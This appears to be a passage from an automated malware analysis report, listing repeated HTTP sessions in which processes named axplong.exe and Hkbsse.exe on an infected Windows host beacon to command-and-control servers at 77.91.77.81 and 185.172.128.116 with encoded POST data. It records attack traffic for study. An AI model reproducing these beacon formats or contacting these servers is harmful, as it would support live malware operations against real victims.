Jun 27, 2024 05:59:32.754064083 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:32.948158026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49813	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:32.482002020 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:33.178527117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:33.179505110 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:33.401931047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49814	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:33.072479010 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:33.709379911 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:33.734680891 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:33.927831888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49815	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:33.516161919 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:34.213918924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:34.219259977 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:34.437284946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49816	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:34.108509064 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:34.733570099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:34.736450911 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:34.926521063 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49817	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:34.559349060 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:35.242891073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:35.318865061 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:35.533620119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49818	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:35.178086042 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:35.774885893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:35.831044912 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:36.021311998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49819	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:35.728737116 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:36.388278961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:36.397636890 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:36.614013910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	49820	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:36.350176096 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:36.967593908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:36.994558096 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:37.186552048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	49821	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:36.834666014 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:37.500744104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:37.678438902 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:37.932207108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	49823	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:37.710434914 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:38.350661039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:38.381707907 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:38.572081089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49824	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:38.061218977 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:38.738295078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:38.738914967 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:38.953073978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	49825	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:38.683796883 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:39.321938038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:39.322623014 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
